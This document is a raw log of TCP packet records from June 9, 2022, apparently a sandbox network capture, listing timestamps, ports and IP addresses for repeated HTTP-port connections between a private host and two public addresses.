Jun 9, 2022 12:19:26.768537998 CEST	80	49778	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:26.890752077 CEST	80	49778	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:26.891000032 CEST	49778	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:26.908199072 CEST	80	49778	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:27.115027905 CEST	80	49778	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:27.116353035 CEST	49778	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:27.987236023 CEST	49779	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:28.004040003 CEST	80	49779	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:28.004196882 CEST	49779	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:28.006927013 CEST	49779	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:28.023806095 CEST	80	49779	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:28.023961067 CEST	49779	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:28.040790081 CEST	80	49779	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:28.178622007 CEST	80	49779	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:28.178792000 CEST	49779	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:28.195605993 CEST	80	49779	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:28.397413015 CEST	80	49779	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:28.397559881 CEST	49779	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:30.759402990 CEST	49782	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:30.776289940 CEST	80	49782	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:30.776431084 CEST	49782	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:30.781711102 CEST	49782	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:30.798563004 CEST	80	49782	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:30.798774958 CEST	49782	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:30.815563917 CEST	80	49782	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:30.919230938 CEST	80	49782	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:30.919357061 CEST	49782	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:30.919470072 CEST	80	49782	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:30.919523954 CEST	49782	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:30.936145067 CEST	80	49782	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:36.252208948 CEST	49783	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:36.269196987 CEST	80	49783	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:36.269325972 CEST	49783	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:36.273915052 CEST	49783	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:36.290786982 CEST	80	49783	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:36.290921926 CEST	49783	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:36.307768106 CEST	80	49783	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:36.381258965 CEST	80	49783	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:36.381405115 CEST	49783	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:36.385018110 CEST	80	49783	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:36.385082960 CEST	49783	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:36.398168087 CEST	80	49783	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:38.982912064 CEST	49784	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:38.999821901 CEST	80	49784	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:39.000009060 CEST	49784	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:39.004620075 CEST	49784	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:39.021780968 CEST	80	49784	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:39.021857977 CEST	49784	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:39.038593054 CEST	80	49784	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:39.411545992 CEST	80	49784	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:39.411669016 CEST	49784	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:39.419692039 CEST	80	49784	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:39.419774055 CEST	49784	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:39.428354025 CEST	80	49784	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:42.582942009 CEST	49785	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:42.600228071 CEST	80	49785	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:42.602312088 CEST	49785	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:42.634597063 CEST	49785	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:42.651849031 CEST	80	49785	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:42.651922941 CEST	49785	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:42.669039965 CEST	80	49785	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:42.788748980 CEST	80	49785	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:42.788887978 CEST	49785	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:42.793615103 CEST	80	49785	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:42.793735027 CEST	49785	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:42.805931091 CEST	80	49785	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:44.335510015 CEST	49786	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:44.352749109 CEST	80	49786	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:44.352864027 CEST	49786	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:44.361043930 CEST	49786	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:44.378196001 CEST	80	49786	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:44.378279924 CEST	49786	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:44.395291090 CEST	80	49786	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:44.643172979 CEST	80	49786	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:44.643297911 CEST	49786	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:44.660331964 CEST	80	49786	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:44.861840963 CEST	80	49786	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:44.861924887 CEST	49786	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:45.836286068 CEST	49792	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:45.853403091 CEST	80	49792	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:45.853585958 CEST	49792	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:45.858683109 CEST	49792	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:45.876003981 CEST	80	49792	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:45.876180887 CEST	49792	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:45.893044949 CEST	80	49792	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:45.962203979 CEST	80	49792	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:45.962380886 CEST	49792	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:45.965529919 CEST	80	49792	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:45.965625048 CEST	49792	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:45.979268074 CEST	80	49792	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:50.488595963 CEST	49793	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:50.505527020 CEST	80	49793	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:50.505652905 CEST	49793	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:50.509118080 CEST	49793	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:50.526077032 CEST	80	49793	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:50.526200056 CEST	49793	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:50.543004036 CEST	80	49793	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:50.626293898 CEST	80	49793	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:50.626399040 CEST	49793	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:50.631148100 CEST	80	49793	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:50.631206989 CEST	49793	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:50.643160105 CEST	80	49793	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:52.703378916 CEST	49794	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:52.720305920 CEST	80	49794	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:52.720393896 CEST	49794	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:52.723949909 CEST	49794	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:52.740783930 CEST	80	49794	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:52.741095066 CEST	49794	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:52.757891893 CEST	80	49794	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:52.869291067 CEST	80	49794	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:52.869484901 CEST	49794	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:52.886282921 CEST	80	49794	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:53.090385914 CEST	80	49794	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:53.090487957 CEST	49794	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:54.837229013 CEST	49796	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:54.854654074 CEST	80	49796	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:54.854806900 CEST	49796	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:54.857506037 CEST	49796	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:54.874870062 CEST	80	49796	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:54.875508070 CEST	49796	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:54.893039942 CEST	80	49796	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:55.001300097 CEST	80	49796	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:55.005203009 CEST	80	49796	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:55.005348921 CEST	49796	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:55.005379915 CEST	49796	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:55.022332907 CEST	80	49796	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:56.577960968 CEST	49797	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:56.594923973 CEST	80	49797	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:56.595025063 CEST	49797	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:56.597737074 CEST	49797	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:56.614602089 CEST	80	49797	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:56.614737988 CEST	49797	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:56.631561995 CEST	80	49797	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:56.728569984 CEST	80	49797	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:56.728739977 CEST	49797	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:56.728759050 CEST	80	49797	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:56.728828907 CEST	49797	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:56.745501041 CEST	80	49797	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:57.981875896 CEST	49798	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:57.999315023 CEST	80	49798	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:57.999437094 CEST	49798	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:58.002191067 CEST	49798	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:58.019268990 CEST	80	49798	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:58.019359112 CEST	49798	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:58.036389112 CEST	80	49798	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:58.143650055 CEST	80	49798	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:58.143800974 CEST	49798	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:58.160957098 CEST	80	49798	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:58.369812012 CEST	80	49798	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:58.371476889 CEST	49798	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:59.335609913 CEST	49799	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:59.352436066 CEST	80	49799	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:59.352571011 CEST	49799	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:59.356295109 CEST	49799	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:59.373097897 CEST	80	49799	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:59.373226881 CEST	49799	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:59.390129089 CEST	80	49799	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:59.465481997 CEST	80	49799	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:59.465641022 CEST	80	49799	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:59.465650082 CEST	49799	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:59.465720892 CEST	49799	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:59.482424021 CEST	80	49799	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:00.754971027 CEST	49800	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:00.771867037 CEST	80	49800	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:00.773791075 CEST	49800	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:00.829407930 CEST	49800	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:00.846271038 CEST	80	49800	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:00.846927881 CEST	49800	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:00.863792896 CEST	80	49800	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:00.950195074 CEST	80	49800	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:00.950227976 CEST	80	49800	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:00.950318098 CEST	49800	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:00.950359106 CEST	49800	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:00.967267036 CEST	80	49800	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:02.342312098 CEST	49801	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:02.359740019 CEST	80	49801	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:02.361860037 CEST	49801	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:02.469934940 CEST	49801	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:02.486787081 CEST	80	49801	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:02.486865044 CEST	49801	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:02.503736973 CEST	80	49801	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:02.583328962 CEST	80	49801	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:02.583445072 CEST	80	49801	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:02.583587885 CEST	49801	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:02.583679914 CEST	49801	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:02.600524902 CEST	80	49801	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:04.029702902 CEST	49802	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:04.046838999 CEST	80	49802	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:04.047013044 CEST	49802	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:04.084400892 CEST	49802	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:04.101612091 CEST	80	49802	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:04.101706028 CEST	49802	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:04.118892908 CEST	80	49802	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:04.228653908 CEST	80	49802	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:04.228724957 CEST	80	49802	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:04.228817940 CEST	49802	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:04.228853941 CEST	49802	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:04.246030092 CEST	80	49802	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:05.444933891 CEST	49803	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:05.467056990 CEST	80	49803	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:05.468657970 CEST	49803	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:05.555366039 CEST	49803	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:05.572211027 CEST	80	49803	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:05.572520018 CEST	49803	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:05.589159012 CEST	80	49803	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:05.664393902 CEST	80	49803	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:05.664552927 CEST	49803	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:05.669153929 CEST	80	49803	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:05.669239044 CEST	49803	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:05.681411982 CEST	80	49803	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:07.438045025 CEST	49804	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:07.454986095 CEST	80	49804	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:07.455106020 CEST	49804	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:07.542974949 CEST	49804	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:07.559683084 CEST	80	49804	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:07.559847116 CEST	49804	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:07.576662064 CEST	80	49804	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:07.654144049 CEST	80	49804	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:07.709064007 CEST	49804	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:07.879829884 CEST	80	49804	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:07.879909039 CEST	49804	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:08.047424078 CEST	49804	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:08.064300060 CEST	80	49804	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:10.577955961 CEST	49805	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:10.595006943 CEST	80	49805	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:10.595140934 CEST	49805	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:10.598373890 CEST	49805	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:10.615386009 CEST	80	49805	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:10.615540981 CEST	49805	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:10.632536888 CEST	80	49805	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:10.712814093 CEST	80	49805	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:10.715125084 CEST	49805	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:10.717983961 CEST	80	49805	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:10.718080997 CEST	49805	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:10.732115030 CEST	80	49805	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:13.338217020 CEST	49807	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:13.355299950 CEST	80	49807	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:13.355441093 CEST	49807	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:13.436188936 CEST	49807	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:13.453286886 CEST	80	49807	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:13.453449965 CEST	49807	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:13.470510006 CEST	80	49807	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:13.591089010 CEST	80	49807	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:13.591221094 CEST	49807	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:13.594422102 CEST	80	49807	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:13.594501972 CEST	49807	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:13.608201981 CEST	80	49807	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:16.233618021 CEST	49810	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:16.250448942 CEST	80	49810	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:16.250562906 CEST	49810	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:16.253890038 CEST	49810	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:16.270783901 CEST	80	49810	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:16.270906925 CEST	49810	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:16.287662983 CEST	80	49810	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:16.367387056 CEST	80	49810	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:16.367506027 CEST	49810	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:16.384238958 CEST	80	49810	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:16.589589119 CEST	80	49810	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:16.589670897 CEST	49810	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:18.179527044 CEST	49817	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:18.196300983 CEST	80	49817	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:18.196494102 CEST	49817	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:18.206398964 CEST	49817	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:18.223120928 CEST	80	49817	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:18.223212957 CEST	49817	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:18.239923954 CEST	80	49817	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:18.321571112 CEST	80	49817	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:18.321686029 CEST	49817	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:18.323549032 CEST	80	49817	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:18.323647976 CEST	49817	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:18.338377953 CEST	80	49817	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:19.447664022 CEST	49819	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:19.464756012 CEST	80	49819	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:19.464859962 CEST	49819	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:19.468605995 CEST	49819	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:19.485603094 CEST	80	49819	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:19.485657930 CEST	49819	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:19.502621889 CEST	80	49819	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:19.651838064 CEST	80	49819	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:19.652024031 CEST	49819	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:19.669224024 CEST	80	49819	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:19.870147943 CEST	80	49819	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:19.870239973 CEST	49819	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:20.847016096 CEST	49820	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:20.864243031 CEST	80	49820	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:20.864358902 CEST	49820	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:20.867616892 CEST	49820	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:20.884805918 CEST	80	49820	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:20.884880066 CEST	49820	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:20.902081013 CEST	80	49820	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:21.059680939 CEST	80	49820	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:21.059714079 CEST	80	49820	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:21.059819937 CEST	49820	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:21.060834885 CEST	49820	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:21.077909946 CEST	80	49820	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:22.668685913 CEST	49824	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:22.685655117 CEST	80	49824	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:22.685779095 CEST	49824	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:22.688766956 CEST	49824	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:22.705775023 CEST	80	49824	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:22.705862999 CEST	49824	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:22.722696066 CEST	80	49824	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:22.830317020 CEST	80	49824	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:22.830532074 CEST	49824	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:22.832551003 CEST	80	49824	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:22.832680941 CEST	49824	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:20:22.847379923 CEST	80	49824	188.114.97.6	192.168.2.3
Jun 9, 2022 12:20:23.961297035 CEST	49832	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:23.978221893 CEST	80	49832	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:23.978319883 CEST	49832	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:23.981117964 CEST	49832	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:23.998279095 CEST	80	49832	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:23.998447895 CEST	49832	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:24.015305042 CEST	80	49832	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:24.125456095 CEST	80	49832	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:24.125608921 CEST	80	49832	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:24.125622034 CEST	49832	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:24.125667095 CEST	49832	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:24.142852068 CEST	80	49832	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:25.186321974 CEST	49839	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:25.203450918 CEST	80	49839	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:25.203594923 CEST	49839	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:25.206676006 CEST	49839	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:25.223751068 CEST	80	49839	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:25.223875999 CEST	49839	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:25.240885019 CEST	80	49839	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:25.361783028 CEST	80	49839	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:25.361867905 CEST	80	49839	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:25.361893892 CEST	49839	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:25.361941099 CEST	49839	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:25.379086018 CEST	80	49839	188.114.96.7	192.168.2.3
Jun 9, 2022 12:20:27.356450081 CEST	49844	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:20:27.373245001 CEST	80	49844	188.114.96.7	192.168.2.3
